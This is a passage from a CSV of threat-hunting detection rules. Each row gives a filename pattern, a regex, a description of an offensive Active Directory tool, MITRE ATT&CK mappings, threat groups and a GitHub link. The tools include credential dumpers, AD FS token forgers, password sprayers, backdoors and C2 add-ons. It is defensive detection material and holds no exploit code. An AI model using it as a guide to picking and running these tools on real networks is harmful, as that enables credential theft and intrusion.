Access","https://github.com/fox-it/adconnectdump","1","1","N/A","10","6","567","85","2024-01-30T14:31:55Z","2019-04-09T07:41:42Z" "*/adcs.py*",".{0,1000}\/adcs\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/adcs_enum/*",".{0,1000}\/adcs_enum\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","1128","202","2024-04-13T00:03:22Z","2020-07-15T16:21:18Z" "*/adcs_request/adcs_request.*",".{0,1000}\/adcs_request\/adcs_request\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection 
BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/adcs_request/CertCli.*",".{0,1000}\/adcs_request\/CertCli\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - 
TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/adcs_request/certenroll.*",".{0,1000}\/adcs_request\/certenroll\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/adcs_request/CertPol.*",".{0,1000}\/adcs_request\/CertPol\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/ADCSCoercePotato.git*",".{0,1000}\/ADCSCoercePotato\.git.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*/ADCSCoercePotato/*",".{0,1000}\/ADCSCoercePotato\/.{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","1","N/A","10","2","176","23","2024-02-28T22:37:14Z","2024-02-26T12:08:34Z" "*/adcs-enum.py*",".{0,1000}\/adcs\-enum\.py.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/adcshunter.git*",".{0,1000}\/adcshunter\.git.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","1","N/A","7","1","76","7","2023-12-15T10:49:39Z","2023-12-14T14:31:05Z" "*/ADCSKiller*",".{0,1000}\/ADCSKiller.{0,1000}","offensive_tool_keyword","ADCSKiller","ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure","T1552.004 - T1003.003 - T1114.002","TA0006 - TA0003 - TA0005","N/A","N/A","Exploitation tools","https://github.com/grimlockx/ADCSKiller","1","1","N/A","N/A","7","680","69","2023-05-19T17:36:37Z","2023-05-19T06:51:41Z" "*/ADCSPwn.exe*",".{0,1000}\/ADCSPwn\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADCSPwn.git*",".{0,1000}\/ADCSPwn\.git.{0,1000}","offensive_tool_keyword","ADCSPwn","A tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service","T1550.002 - T1078.003 - T1110.003","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bats3c/ADCSPwn","1","1","N/A","10","8","796","119","2023-03-20T20:30:40Z","2021-07-30T15:04:41Z" "*/adcsync.git*",".{0,1000}\/adcsync\.git.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*/adcsync.py*",".{0,1000}\/adcsync\.py.{0,1000}","offensive_tool_keyword","adcsync","Use ESC1 to perform a makeshift DCSync and dump hashes","T1003.006 - T1021","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/JPG0mez/ADCSync","1","1","N/A","9","2","185","21","2023-11-02T21:41:08Z","2023-10-04T01:56:50Z" "*/add_computer.py*",".{0,1000}\/add_computer\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 
- TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/add_groupmember.py*",".{0,1000}\/add_groupmember\.py.{0,1000}","offensive_tool_keyword","acltoolkit","acltoolkit is an ACL abuse swiss-army knife. It implements multiple ACL abuses","T1222.001 - T1222.002 - T1046","TA0007 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/zblurx/acltoolkit","1","1","N/A","N/A","2","113","14","2023-02-03T10:27:45Z","2022-01-12T22:45:49Z" "*/addcomputer_LDAP_spn.py*",".{0,1000}\/addcomputer_LDAP_spn\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/addcomputer_with_spns.py*",".{0,1000}\/addcomputer_with_spns\.py.{0,1000}","offensive_tool_keyword","Ouned","The OUned project automating Active Directory Organizational Units ACL exploitation through gPLink poisoning","T1484 - T1210","TA0001 - TA0004 - TA0005 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/synacktiv/Ouned","1","1","N/A","10","1","50","7","2024-04-17T10:34:03Z","2024-04-17T10:18:04Z" "*/Add-RemoteRegBackdoor.ps1*",".{0,1000}\/Add\-RemoteRegBackdoor\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/address-info.nse*",".{0,1000}\/address\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/AddUser-Bof.*",".{0,1000}\/AddUser\-Bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/AddUser-Bof/*",".{0,1000}\/AddUser\-Bof\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF that Add an admin user","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/0x3rhy/AddUser-Bof","1","1","N/A","10","10","63","14","2022-10-11T06:51:27Z","2021-08-30T10:09:20Z" "*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*/ADeleg.exe*",".{0,1000}\/ADeleg\.exe.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/adeleg.git*",".{0,1000}\/adeleg\.git.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. 
It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*/adeleg.pdb*",".{0,1000}\/adeleg\.pdb.{0,1000}","offensive_tool_keyword","adeleg","an Active Directory delegation management tool. It allows you to make a detailed inventory of delegations set up so far in a forest","T1595 - T1087.002 - T1069.002","TA0007 - TA0004","N/A","N/A","Discovery","https://github.com/mtth-bfft/adeleg","1","1","N/A","8","3","246","30","2023-06-07T15:08:53Z","2022-02-09T19:47:04Z" "*/ADeleginator.git*",".{0,1000}\/ADeleginator\.git.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/ADFSDump.exe*",".{0,1000}\/ADFSDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADFSDump.git*",".{0,1000}\/ADFSDump\.git.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","1","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*/ADFSpoof.py*",".{0,1000}\/ADFSpoof\.py.{0,1000}","offensive_tool_keyword","ADFSpoof","A python tool to forge AD FS security tokens.","T1600 - T1600.001 - T1552 - T1552.004","TA0006 - TA0001","N/A","N/A","Sniffing & Spoofing","https://github.com/mandiant/ADFSpoof","1","1","N/A","10","4","330","57","2024-04-03T11:48:50Z","2019-03-20T22:30:58Z" "*/ADFSpray*",".{0,1000}\/ADFSpray.{0,1000}","offensive_tool_keyword","adfspray","Python3 tool to perform password spraying against Microsoft Online service using various methods","T1110.003","TA0006","N/A","N/A","Credential Access","https://github.com/xFreed0m/ADFSpray","1","1","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*/ADFSRelay.git*",".{0,1000}\/ADFSRelay\.git.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. 
Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/ADFSRelay.go*",".{0,1000}\/ADFSRelay\.go.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/ADHunt.git*",".{0,1000}\/ADHunt\.git.{0,1000}","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","Discovery","https://github.com/karendm/ADHunt","1","1","AD Enumeration","7","1","44","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" "*/adidnsdump.git*",".{0,1000}\/adidnsdump\.git.{0,1000}","offensive_tool_keyword","adidnsdump","By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones. similar to a zone transfer. 
This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.","T1018 - T1087 - T1201 - T1056 - T1039","TA0005 - TA0009","N/A","N/A","Discovery","https://github.com/dirkjanm/adidnsdump","1","1","N/A","N/A","9","849","104","2023-12-13T15:56:51Z","2019-04-24T17:18:46Z" "*/ad-ldap-enum.git*",".{0,1000}\/ad\-ldap\-enum\.git.{0,1000}","offensive_tool_keyword","ad-ldap-enum","An LDAP based Active Directory user and group enumeration tool","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/CroweCybersecurity/ad-ldap-enum","1","1","AD Enumeration","6","4","301","67","2023-02-10T19:07:34Z","2015-08-25T19:38:39Z" "*/adm2sys.py*",".{0,1000}\/adm2sys\.py.{0,1000}","offensive_tool_keyword","PyExec","This is a very simple privilege escalation technique from admin to System. This is the same technique PSExec uses.","T1134 - T1055 - T1548.002","TA0004 - TA0005 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/OlivierLaflamme/PyExec","1","1","N/A","9","1","10","7","2019-09-11T13:56:04Z","2019-09-11T13:54:15Z" "*/admin_persistence_winlogon.c*",".{0,1000}\/admin_persistence_winlogon\.c.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","1","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*/Admin2Sys.git*",".{0,1000}\/Admin2Sys\.git.{0,1000}","offensive_tool_keyword","Admin2Sys","Admin2Sys it's a C++ malware to escalate privileges from Administrator account to NT AUTORITY SYSTEM","T1055.002 - T1078.003 - T1068","TA0002 - TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/S12cybersecurity/Admin2Sys","1","1","N/A","10","1","37","16","2023-05-01T19:32:41Z","2023-05-01T18:50:51Z" "*/admin-panels.txt*",".{0,1000}\/admin\-panels\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*/ADRecon*",".{0,1000}\/ADRecon.{0,1000}","offensive_tool_keyword","pingcastle","active directory weakness scan Vulnerability scanner and Earth Lusca Operations Tools and commands","T1087 - T1012 - T1064 - T1210 - T1213 - T1566 - T1071","TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Information Gathering","https://github.com/sense-of-security/ADRecon","1","1","N/A","N/A","10","1609","274","2020-06-15T05:23:14Z","2017-11-29T23:01:53Z" "*/ADSearch.exe*",".{0,1000}\/ADSearch\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*/ADSearch.git*",".{0,1000}\/ADSearch\.git.{0,1000}","offensive_tool_keyword","adsearch","A tool to help query AD via the LDAP protocol","T1087 - T1069.002 - T1018","TA0003 - TA0002 - TA0007","N/A","N/A","Reconnaissance","https://github.com/tomcarver16/ADSearch","1","1","N/A","N/A","5","403","45","2023-07-07T14:39:50Z","2020-06-17T22:21:41Z" "*/aerosol.py*",".{0,1000}\/aerosol\.py.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","0","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*/afp-brute.nse*",".{0,1000}\/afp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-ls.nse*",".{0,1000}\/afp\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-path-vuln.nse*",".{0,1000}\/afp\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/afp-serverinfo.nse*",".{0,1000}\/afp\-serverinfo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation 